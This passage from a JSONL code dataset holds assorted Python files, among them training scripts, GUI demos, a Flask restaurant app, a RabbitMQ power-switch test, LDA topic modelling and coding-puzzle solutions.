top5=top5))\n \n if args.method == 'ols': \n for cls in range(numberofclass):\n if self.cur_epoch_cnt[cls].max() < 0.5:\n self.loss_lams[cls] = 1. / numberofclass \n else:\n self.loss_lams[cls] = self.cur_epoch_lams[cls] / self.cur_epoch_cnt[cls] \n return losses.avg\n\n def validate(self, val_loader, epoch):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n self.model.eval()\n end = time.time()\n\n for i, (input, target) in enumerate(val_loader):\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n with torch.no_grad():\n output = self.model(input_var)\n loss = self.criterion(output, target_var)\n # measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0 and args.verbose == True:\n print('Test (on val set): [{0}/{1}][{2}/{3}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, 196, batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n\n print('* Epoch: [{0}/{1}]\\t Top 1-err {top1.avg:.3f} Top 5-err {top5.avg:.3f}\\t Test Loss {loss.avg:.3f}'.format(\n epoch, args.epochs, top1=top1, top5=top5, loss=losses))\n return top1.avg, top5.avg, losses.avg\n def save_scripts(self, val_loader, epoch, prop):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n self.model.eval()\n end = time.time()\n\n save_name = args.net_type + '_' + args.method + '_' + prop \n embedding = []\n labels = []\n\n for i, (input, target) in enumerate(val_loader):\n if i > 80:\n break\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n with torch.no_grad():\n output, ebd = self.model(input_var)\n for j in range(ebd.shape[0]):\n embedding.append(ebd[j].detach().cpu().numpy())\n labels.append(target[j].detach().cpu().numpy())\n \n loss = self.criterion(output, target_var)\n # measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0 and args.verbose == True:\n print('Test (on val set): [{0}/{1}][{2}/{3}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, 196, batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n embedding = np.array(embedding)\n labels = np.array(labels)\n print('------',embedding.shape)\n for kk in range(10):\n print(embedding[kk].shape)\n np.save('./embeddings/' + save_name + '_' + 'emd.npy', embedding)\n np.save('./embeddings/' + save_name + '_' + 'labels.npy', labels)\n \n print('* Epoch: [{0}/{1}]\\t Top 1-err {top1.avg:.3f} Top 5-err {top5.avg:.3f}\\t Test Loss {loss.avg:.3f}'.format(\n epoch, args.epochs, top1=top1, top5=top5, loss=losses))\n return top1.avg, top5.avg, losses.avg\n \n \n def visualize(self, dataloader, classes_id = [5, 2, 1], samples_per_class = 100):\n data = torch.zeros(samples_per_class * len(classes_id), 256, dtype=torch.float32)\n target = torch.zeros(samples_per_class * len(classes_id), dtype=torch.float32)\n cnt = torch.ones(len(classes_id), dtype=torch.long) * samples_per_class\n cur_cnt = 0\n with torch.no_grad():\n for i, (input, y) in enumerate(dataloader):\n output, attens = self.model(input)\n if cnt.sum() == 0:\n break\n for kk in range(input.shape[0]):\n if int(y[kk]) in classes_id and cnt[classes_id.index(y[kk])] > 0:\n data[cur_cnt] = attens[kk]\n target[cur_cnt] = y[kk]\n \n cnt[classes_id.index(y[kk])] = cnt[classes_id.index(y[kk])] - 1\n cur_cnt += 1\n \n return data, target\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n directory = \"%s/runs/record_dir/%s/\" % (args.save_dir, args.expname)\n if not os.path.exists(directory):\n os.makedirs(directory)\n filename = directory + filename\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, '%s/runs/record_dir/%s/' % (args.save_dir, args.expname) + 'model_best.pth.tar')\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n if args.dataset.startswith('cifar') or args.dataset == ('tiny-imagenet'):\n lr = args.lr * (0.1 ** (epoch // (args.epochs * 0.5))) * (0.1 ** (epoch // (args.epochs * 0.75)))\n elif args.dataset == ('imagenet'):\n if args.epochs == 300:\n lr = args.lr * (0.1 ** (epoch // 75))\n elif args.epochs > 30:\n lr = args.lr * (0.1 ** (epoch // 30))\n #else:\n # if epoch < 10:\n # lr = args.lr\n # elif epoch < 40:\n # lr = args.lr * 0.1\n # else:\n # lr = args.lr * 0.01\n #lr = args.lr * (0.1 ** (epoch // 10))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\ndef get_learning_rate(optimizer):\n lr = []\n for param_group in optimizer.param_groups:\n lr += [param_group['lr']]\n return lr\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n wrong_k = batch_size - correct_k\n res.append(wrong_k.mul_(100.0 / batch_size))\n\n return res\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cifar/scripts/train_cifar_all_methods.py","file_name":"train_cifar_all_methods.py","file_ext":"py","file_size_in_byte":28485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156303977","text":"# -*- coding: utf-8 -*-\n# author: Guoanboyu\n# email: guoappserver@gmail.com\n\n#main.pyw\nimport sys\nfrom PyQt4 import QtCore, QtGui\n\nfrom cloud_picture.untitled import Ui_MainWindow\n\nclass MyForm(QtGui.QMainWindow):\n def __init__(self, parent = None):\n QtGui.QMainWindow.__init__(self,parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n form = MyForm()\n form.show()\n sys.exit(app.exec_())","sub_path":"cloud_picture/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312161056","text":"import nltk\nimport time\nimport csv\nfrom gensim import corpora\nfrom gensim.models.ldamodel import LdaModel\nfrom os import listdir\nfrom nltk.corpus.reader import CHILDESCorpusReader\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.corpus import stopwords, wordnet\n\nstart = time.time()\ncorpus_root = nltk.data.find('corpora/childes/data-xml/Eng-USA-MOR/')\nfolders = listdir('C:/nltk_data/corpora/childes/data-xml/Eng-USA-MOR')\n\n#stemmer = SnowballStemmer(\"english\")\n\nsw = stopwords.words('english')\nsw.extend(['xxx', 'yyy', 'www', 'huh', 'yeah','ever', 'even', 'anyway', 'everybody', \n'yes', 'mhm', 'yep', 'uhhuh', 'alright', 'never', 'sometimes', 'either', 'everyone'\n'gonna', 'goin', 'another', 'okay', 'hey', 'anything', 'ready', 'uhuh', 'ouch', 'only', \n'away', 'sure', 'well', 'right', 'okay', 'would', 'around', 'across', 'everything', \n'maybe', 'big', 'little', 'nice', 'wow', 'new', 'cool', 'else', 'ago', 'almost', 'another', \n'ahead', 'always', 'already', 'whoops', 'em', 'wan', 'much', 'nope', 'hum', 'anyways', \n'yet', 'though', 'somethin', 'cha', 'anything', 'somebody', 'may', 'still', 'uhoh', \n'also', 'instead', 'whose', 'without', 'behind', 'anybody', 'any', 'away', 'why', \n'please', 'yay', 'oops', 'any', 'please', 'another', 'something', 'very'])\n#sw = [stemmer.stem(item) for item in sw]\n\nwith open ('animal.csv', 'rb')as f:\n reader = csv.reader(f)\n animal = []\n for row in reader:\n animal.extend(row)\n\nchildes = CHILDESCorpusReader(corpus_root, '.*.xml', lazy=False)\nfiles = childes.fileids()\nresultlist = []\n\nfor filename in files:\n sents = childes.sents(filename)[0]\n for sent in sents:\n result_lower = [item.lower() for item in sent]\n #result_stem = [stemmer.stem(item) for item in result_lower]\n result_clean = [item for item in result_lower if '\\'' not in item \n and '_' not in item and len(item) > 1]\n result = [item for item in result_clean if item not in sw]\n resultlist.append(result)\nprint(resultlist[0])\n\n \ndictionary = corpora.Dictionary(resultlist)\ncorpus = [dictionary.doc2bow(text) for text in resultlist]\n\nlda = LdaModel(corpus = corpus, id2word = dictionary, num_topics = 500)\ntopiclist = lda.print_topics(num_topics = 500, num_words = 50)\nlda.save('childs_sent_500.model')","sub_path":"childes/childes-500-sent.py","file_name":"childes-500-sent.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15127943","text":"\"\"\" A PyFace widget for a command binding. \"\"\"\n\n\nimport wx\n\nfrom envisage.import_manager import ImportManager\nfrom pyface.api import Widget\nfrom traits.api import Instance\n\nfrom pgv.red.ui.command_library import CommandBinding\nfrom pgv.red.ui.keyboard import get_key_combination_name\n\n\nclass CommandBindingWidget(Widget):\n \"\"\" A PyFace widget for a command binding. \"\"\"\n\n #### 'object' protocol ####################################################\n\n def __init__(self, **traits):\n \"\"\" Create the widget. \"\"\"\n\n # Base class constructor.\n super(CommandBindingWidget, self).__init__(**traits)\n\n # Create the toolkit-specific control that represents the widget.\n self.control = self._create_control(self.parent)\n\n #### 'AddCommandBindingWidget' protocol ####################################\n\n # The command binding that we are editing.\n command_binding = Instance(CommandBinding)\n \n #### Protected 'Widget' protocol ##########################################\n\n def _create_control(self, parent):\n \"\"\" Create the widget's toolkit-specific control. \"\"\"\n\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n panel = wx.Panel(parent, -1)\n panel.SetSizer(sizer)\n panel.SetAutoLayout(True)\n\n key_combination_control = self._create_key_combination_control(\n panel, self.command_binding\n )\n sizer.Add(key_combination_control, 0, wx.RIGHT, 5)\n\n factory_name_control = self._create_command_factory_name_control(\n panel, self.command_binding\n )\n sizer.Add(factory_name_control, 1, wx.EXPAND)\n\n sizer.Fit(panel)\n return panel\n\n #### Private protocol ######################################################\n\n # Used to import command factories.\n _import_manager = Instance(ImportManager, ())\n\n def _create_command_factory_name_control(self, parent, command_binding):\n \"\"\" Create a control for the command factory name. \"\"\"\n\n command_factory_name = command_binding.command_factory_name\n \n text_ctrl = wx.TextCtrl(parent, -1, command_factory_name)\n\n self._set_command_factory_tooltip(\n text_ctrl, command_binding.command_factory_name\n )\n\n def text_changed(event):\n command_binding.command_factory_name = text_ctrl.GetValue()\n\n self._set_command_factory_tooltip(\n text_ctrl, command_binding.command_factory_name\n )\n event.Skip()\n \n text_ctrl.Bind(wx.EVT_TEXT, text_changed)\n\n return text_ctrl\n\n def _set_command_factory_tooltip(self, control, command_factory_name):\n \"\"\" Set the command factory tooltip on a control. \"\"\"\n\n tool_tip = wx.ToolTip(\n tip=self._get_command_factory_docstring(command_factory_name)\n )\n control.SetToolTip(tool_tip)\n \n def _get_command_factory_docstring(self, command_factory_name):\n \"\"\" Return the docstring for the command factory with the given name.\n\n \"\"\"\n\n try:\n command_factory = self._import_manager.import_symbol(\n command_factory_name\n )\n docstring = command_factory.__doc__\n \n except:\n docstring = 'command factory does not exist!'\n \n return docstring\n \n def _create_key_combination_control(self, parent, command_binding):\n \"\"\" Create a control for the key code/modifier combination. \"\"\"\n\n key_code, modifiers = command_binding.key_combination\n \n style = wx.TE_PROCESS_TAB | wx.TE_PROCESS_ENTER\n text_ctrl = wx.TextCtrl(\n parent, -1, get_key_combination_name(key_code, modifiers),\n style = style\n )\n\n def character_entered(event):\n key_code = event.GetKeyCode()\n modifiers = event.GetModifiers()\n\n key_combination_name = get_key_combination_name(key_code, modifiers)\n\n text_ctrl.SetValue(key_combination_name)\n command_binding.key_combination = (key_code, modifiers)\n \n text_ctrl.Bind(wx.EVT_CHAR, character_entered)\n\n return text_ctrl\n\n#### EOF #######################################################################\n","sub_path":"source/pgv/red/ui/command_binding_widget.py","file_name":"command_binding_widget.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"189016290","text":"#!/usr/bin/env python\nimport pika\nimport time\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n 'rabbitmq.dev.twleansw.com'))\nchannel = connection.channel()\nfor i in range(0, 2) :\n\tchannel.queue_declare(queue='remote_power_switch')\n\tchannel.basic_publish(exchange='',\n\t routing_key='remote_power_switch',\n\t body='POWER_ON')\n\tprint(\" [x] Sent POWER_ON\")\n\ttime.sleep(5) # delays for 5 seconds\n\t\n\tchannel.queue_declare(queue='remote_power_switch')\n\tchannel.basic_publish(exchange='',\n\t routing_key='remote_power_switch',\n\t body='POWER_OFF')\n\ttime.sleep(5) # delays for 5 seconds\n\tprint(\" [x] Sent POWER_OFF\")\n\n","sub_path":"pi3_python/test_mq_send_switch_command.py","file_name":"test_mq_send_switch_command.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"288655822","text":"'''\nSolution:\n1. Insert all new possible words to the Trie.\n2. For each old word (split in the sentence by a space), check whether any subword is present in the Trie as a word\n and if present replace the sub-word with the old word and otherwise leave the old-word as is.\n3. Return the sentence conaining replaced words.\n\nTime Complexity: O(n * L) n is no. of words and L is max length of one word\nSpace Complexity: O(n * L) max space occupied by the Trie; there is also space occupied by new sentence which is again\n O(n * L) and so total space complexity would be O(n * L)\n\n--- Passed all testcases on Leetcode successfully\n'''\n\n\nclass TrieNode(object):\n\n def __init__(self):\n self.children = [None for i in range(26)]\n self.word = None\n\n\nclass Trie(object):\n\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word):\n\n # function to insert a word in a Trie data structure\n\n # initialize to the root of the trie as current node\n currNode = self.root\n\n # traverse the trie until we hit the length of word to be inserted\n for i in range(len(word)):\n currChar = word[i]\n if (currNode.children[ord(currChar) - ord('a')] == None):\n currNode.children[ord(currChar) - ord('a')] = TrieNode()\n currNode = currNode.children[ord(currChar) - ord('a')]\n\n currNode.word = word\n\n\nclass ReplaceWords(object):\n def replaceWords(self, dict, sentence):\n \"\"\"\n :type dict: List[str]\n :type sentence: str\n :rtype: str\n \"\"\"\n # initialize a Trie\n trie = Trie()\n\n # insert all words to a Trie present in the dict\n for word in dict:\n trie.insert(word)\n\n # intialize a list to append all new words replacing old words\n newWords = []\n\n # traverse all words\n for word in sentence.split():\n\n # traverse the entire old word until you hit a sub-word\n currNode = trie.root\n for i in range(len(word)):\n currChar = word[i]\n if (currNode.children[ord(currChar) - ord('a')] == None or currNode.word != None): # condition to break\n break\n currNode = currNode.children[ord(currChar) - ord('a')]\n\n newWord = currNode.word # take the new word to be the subword till we traversed\n\n if (newWord == None): # if new word not a word, then append old word itself\n newWords.append(word)\n else: # else append new word\n newWords.append(newWord)\n\n return ' '.join(newWords) # join the list of new words as a string\n","sub_path":"ReplaceWords.py","file_name":"ReplaceWords.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"629983861","text":"from flask import Flask, render_template, redirect, url_for, request\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\napp = Flask(__name__)\n\n#create engine to reference db\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind = engine)\nsession = DBSession()\n\n\n@app.route('/')\ndef hello():\n\toutput = \"\"\n\toutput += \"hello!\"\n\treturn output\n\n@app.route('/restaurants')\ndef restaurants():\n\trestaurants = session.query(Restaurant).all()\n\treturn render_template(\"restaurant.html\", restaurants = restaurants)\n\n@app.route('/restaurants/new', methods=['GET','POST'])\ndef newRestaurant():\n\tif request.method == 'POST':\n\t\tnewRestaurant = Restaurant(name = request.form['name'])\n\t\tsession.add(newRestaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template(\"newrestaurant.html\")\n\n\n@app.route('/restaurants//edit', methods=['GET','POST'])\ndef editRestaurant(restaurant_id):\n\trestaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n\tif request.method =='POST':\n\t\trestaurant.name = request.form[\"newName\"]\n\t\tsession.add(restaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template('editrestaurant.html',restaurant = restaurant)\n\n\n@app.route('/restaurants//delete', methods=['GET','POST'])\ndef deleteRestaurant(restaurant_id):\n\trestaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n\tif request.method == 'POST':\n\t\tsession.delete(restaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template('deleterestaurant.html',restaurant=restaurant)\n\n\n\n@app.route('/restaurants//menu')\ndef restaurantMenu(restaurant_id):\n\titems = session.query(MenuItem).filter_by(restaurant_id = restaurant_id).all()\n\treturn render_template('menu.html',items = items)\n\treturn \"the menu items for restaurant with id\"\n\n@app.route('/restaurants//menu/new')\ndef newMenuItem(restaurant_id):\n\treturn \"creating a new menu item\"\n\n@app.route('/restaurants//menu//edit')\ndef editMenuItem():\n\treturn \"editing menu item with id\"\n\n@app.route('/restaurants//menu//delete')\ndef deleteMenuItem():\n\treturn \"confirmation for deleting menu item with id\"\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run(host='0.0.0.0', port=5000)","sub_path":"vagrant/Lesson5/restaurantserver.py","file_name":"restaurantserver.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"31934968","text":"from collections import deque\nT=int(input())\n\ndef bfs(x,y):\n global cnt\n queue=deque()\n queue.append((x,y))\n cnt=0\n \n # visited[x][y]=True\n while queue:\n x,y=queue.popleft()\n cnt+=1\n for i in range(4):\n nx=x+dx[i]\n ny=y+dy[i]\n if nx>=N or ny>=M or nx<0 or ny<0:\n continue\n if graph[nx][ny]==0:\n continue\n if graph[nx][ny]==1:\n graph[nx][ny]=0\n queue.append((nx,ny))\n return cnt\n \nfor t in range(T):\n count=0\n dx=[-1,1,0,0]\n dy=[0,0,-1,1]\n M,N,K=map(int,input().split()) #가로, 세로, 배추 위치 개수\n graph=[[0]*(M+1) for _ in range(N+1)]\n \n for k in range(K):\n x,y=map(int,input().split())\n graph[y][x]=1 #x가로 y세로\n \n for i in range(N+1): #i 세로 j 가로\n for j in range(M+1):\n if graph[i][j]==1:\n # print(bfs(i,j))\n bfs(i,j)\n count+=1\n \n print(count)","sub_path":"baekjoon/단계별 문제/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"412345666","text":"import glob\nimport numpy as np\n\nfiles = glob.glob('./codedata/*/*', recursive=True)\n\n# Split files into test/train set\nnp.random.seed(1000) # For reproducability\nnp.random.shuffle(files)\nN = int(float(len(files))*0.8) # Do an 80-20 split for training/validation\n\ndata = dict(\n train=files[:N],\n valid=files[N-len(files):],\n)\n\nnum_nq_examples = dict(train=N, valid=len(files)-N)\n\nprint(num_nq_examples)\n","sub_path":"globit.py","file_name":"globit.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"505681564","text":"from tkinter import *\r\nroot = Tk()\r\n\r\nroot.geometry('300x200')\r\nroot.title(\" ATTRIBUTES TUTORIAL \")\r\n# start attributes\r\n'''\r\nimportant label attributes\r\ntext-adds the text\r\nbg-backgroung \r\nfg-foreground\r\nfont-set the font\r\npadx-x padding\r\npady-y padding\r\nrelief-borderstyling-SUNKEN,RAISED,GROOVE,RIDGE\r\n\r\n\r\nimportant pack attributes\r\nanchor=nw,ew,es,sw,etc\r\nside=top,bottom,left,right\r\nfill x & Y\r\npadding- x & y \r\n'''\r\nsaqib = Label(text='''“Dream is not that which \r\nyou see while sleeping it is\r\n something that does not let you sleep.”\r\n― A P J Abdul Kalam''', bg='orange', fg='blue', padx=15, pady=50, font=\"comicsansms 19 bold\", borderwidth=5, relief=SUNKEN)\r\n\r\nsaqib.pack(side=BOTTOM, anchor=\"sw\", fill=X, padx=20, pady=50)\r\nroot.mainloop()\r\n","sub_path":"attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"123515168","text":"import os\nimport sys\n\n\nfiles = [\n\t\"Server.cs\",\n\t\"Threading.cs\",\n\t\"Logger.cs\",\n\t\"ProtocolFormat.cs\",\n\t\"NetworkCommand.cs\",\n\t\"Constants.cs\",\n\t\"BinaryConverter.cs\",\n\t\"NetworkName.cs\"\n]\n\nbuild_exe = \"--exe\" in sys.argv\n\n# if \"--exe\" in sys.argv:\n# \tprint (\"Building standalone server\")\n# \tcall = \"csc -out:Server2.exe Program.cs -r:MorkoNetwork.dll\"\n# else:\n\nprint (\"Building MorkoNetwork library\")\ncall = \"csc -out:MorkoNetwork.dll -unsafe -debug -target:library {}\".format(\" \".join(files))\n\nos.system(call)\n","sub_path":"Network/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"287985369","text":"import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nimport tensorflow as tf\n\n\n# In[271]:\n\n\ndef model(num_units, dropout = 0.0):\n \n classifier = Sequential()\n classifier.add(Dense(4*num_units,activation='relu',kernel_initializer='uniform', input_dim = 4039))\n classifier.add(Dropout(dropout))\n classifier.add(Dense(2*num_units, activation = 'relu', kernel_initializer='uniform'))\n classifier.add(Dropout(dropout))\n classifier.add(Dense(num_units, activation = 'relu', kernel_initializer='uniform'))\n classifier.add(Dense(1, activation='sigmoid', kernel_initializer='uniform'))\n return classifier\n\n\n# In[272]:\n\n\nclassifier = model(5, 0.3)\n\n\n# In[273]:\n\n\noptimizer = keras.optimizers.Adam(lr = 0.0001)\n\n\n# In[274]:\n\n\nclassifier.compile(optimizer=optimizer,loss='binary_crossentropy',metrics=['accuracy'])\n\n\n# In[275]:\n\n\nclassifier.fit(xTrain,yTrain,batch_size = 128, epochs = 200)\n\n\n# In[276]:\n\n\ny_p = classifier.predict(xTrain)\n\n\n# In[277]:\n\n\ny_p_1 = classifier.predict(xval)\n\n\n# In[278]:\n\n\nerror = 0\n#y_pred_1 = y_pred[:, 1]\nj = 0\nfor i in yTrain:\n #print(j)\n error1 = i - y_p[j][0]\n #print(str(i) + \" \" + str(y_pred_1[j])+\" \" + str(abs(error1)))\n error = error + abs(error1)\n j = j +1\n\nmse = error/len(y_p)\nprint(mse)\nprint(1 /(1+mse))\n\n\n# In[279]:\n\n\nerror = 0\n#y_pred_1 = y_pred[:, 1]\nj = 0\nfor i in yval:\n #print(j)\n error1 = i - y_p_1[j][0]\n #print(str(i) + \" \" + str(y_pred_1[j])+\" \" + str(abs(error1)))\n error = error + abs(error1)\n j = j +1\n\nmse = error/len(y_p)\nprint(mse)\nprint(1 /(1+mse))\n\n\n# In[280]:\n\n\ny_p_2 = classifier.predict(X_test)\n\n\n# In[281]:\n\n\nprint(y_p_2)\n\n\n# In[299]:\n\n\nprint(print(id_test))\n\nprint(len(y_p_2))\nid_test.count()\n\n\n# In[301]:\n\n\nid_test.head()\n\n\n# In[313]:\n\n\nids = id_test.iloc[:].values\nprint(ids)\n\n\n# In[323]:\n\n\nv_id = []\nj = 0\n\nfor i in ids:\n if not pd.isnull(i):\n v_id.append(j)\n j = j+1\n\n\n# In[324]:\n\n\nprint(v_id)\n\n\n# In[325]:\n\n\npout = y_p_2[v_id]\niout = ids[v_id]\n\n\n# In[326]:\n\n\npredictions = pd.DataFrame(pout, columns=['is_goal'])\nidss = pd.DataFrame(iout, columns=['shot_id_number'])\npredictions = pd.concat((idss, predictions), axis = 1)\npredictions.to_csv('result1.csv', sep=\",\", index = False)\n\n\n","sub_path":"Nn.py","file_name":"Nn.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"650781147","text":"#!/user/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: ChenHanping\n@Email:\n@QQ:\n\n@date: 2019/12/3\n@description:\n\"\"\"\nimport json\nimport copy\nfrom datetime import datetime,timedelta\nimport ctx\n# from src import ctx\nfrom service.handlers.base import BaseHandler\nfrom utils import api_util\n\ndef _db():\n return ctx.modledb['model_result_simulation']\n\ndef tt(date):\n #datetime转换为字符串T%H%M\n at = ((date.minute) // 15) * 15\n if at==0:\n at='00'\n t = date.strftime('T%H')+str(at)\n return t\n\ndef conversion(target1,date,t,staTime,endTime):\n DATA = {}\n res = []\n # 预测数据\n for target in target1:\n statusYC = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 1, 'SCADATYPE': 5}\n frequencyYC = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 1, 'SCADATYPE': 7}\n if target == 'PMP-1':\n for v in _db().find_one(frequencyYC, {'_id': 0, t: 1}).values():\n for i in v:\n if i['time'] < endTime:\n DATA['id'] = target\n DATA['time'] = i['time']\n DATA['status'] = i['status']\n DATA['frequency'] = i['frequency']\n Date = copy.copy(DATA)\n res.append(Date)\n else:\n for a in _db().find_one(statusYC, {'_id': 0, t: 1}).values():\n for i in a:\n if i['time'] < endTime:\n DATA['id'] = target\n DATA['time'] = i['time']\n DATA['status'] = i['status']\n DATA['frequency'] = i['frequency']\n Date = copy.copy(DATA)\n res.append(Date)\n # 回算数据\n for target in target1:\n statusHS = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 0, 'SCADATYPE': 5}\n # frequencyHS = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 0, 'SCADATYPE': 7}\n for v in _db().find_one(statusHS, {'_id': 0, t: 1}).values():\n res2 = [m for m in v]\n res2.sort(key=lambda x: x['time'], reverse=True)\n for m in res2:\n DATA['id'] = target\n DATA['time'] = m['time']\n DATA['status'] = m['status']\n if DATA['time'] < staTime:\n DATA['time'] = staTime + \" 00:00:00\"\n Date = copy.copy(DATA)\n res.append(Date)\n break\n Date = copy.copy(DATA)\n res.append(Date)\n # 排序\n res.sort(key=lambda x: x['time'])\n return res\n\nclass SchHadl(BaseHandler):\n async def get(self):\n # 获取编号\n target = self.get_argument('target_id', None)\n if not target:\n self.return_failed()\n return\n target1 = target.split(',')\n #获取时间,时间为空用当前时间\n newTime = self.get_argument('new_time', None)\n if not newTime:\n NTime = datetime.now()\n else:\n NTime = datetime.strptime(newTime, \"%Y-%m-%d %H:%M:%S\")\n t = tt(NTime)\n #获取日期\n date = NTime.strftime('%Y%m%d')\n #开始时间,结束时间\n staTime = NTime.strftime('%Y-%m-%d')\n endTime = (NTime+timedelta(days=1)).strftime('%Y-%m-%d')\n result = await api_util.call_blocking(conversion, target1,date,t,staTime,endTime)\n self.write(json.dumps(result, ensure_ascii=False))\n\n\n\n\n","sub_path":"src/service/handlers/schedule_handler.py","file_name":"schedule_handler.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"546702562","text":"from selenium.webdriver.common.by import By\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\yordi\\Automation\\python-selenium-automation\\chromedriver.exe\")\ndriver.maximize_window()\ndriver.implicitly_wait(5)\n\n\ndriver.get('https://www.amazon.com/')\n\ndriver.find_element(By.ID, 'nav-cart-count-container').click()\n\nactual_result = driver.find_element(By.XPATH, \"//div[@class='a-row sc-your-amazon-cart-is-empty']/h2\").text\nexpected_result = 'Your Amazon Cart is empty'\nassert expected_result == actual_result, f'Expected{expected_result},but got {actual_result}'","sub_path":"features/Test_amazon_cart.py","file_name":"Test_amazon_cart.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"119177163","text":"import numpy\nfrom fqe import Wavefunction\nimport cProfile\n\nif __name__ == '__main__':\n norb = 10\n nel = norb\n sz = 0\n h1e_spa = 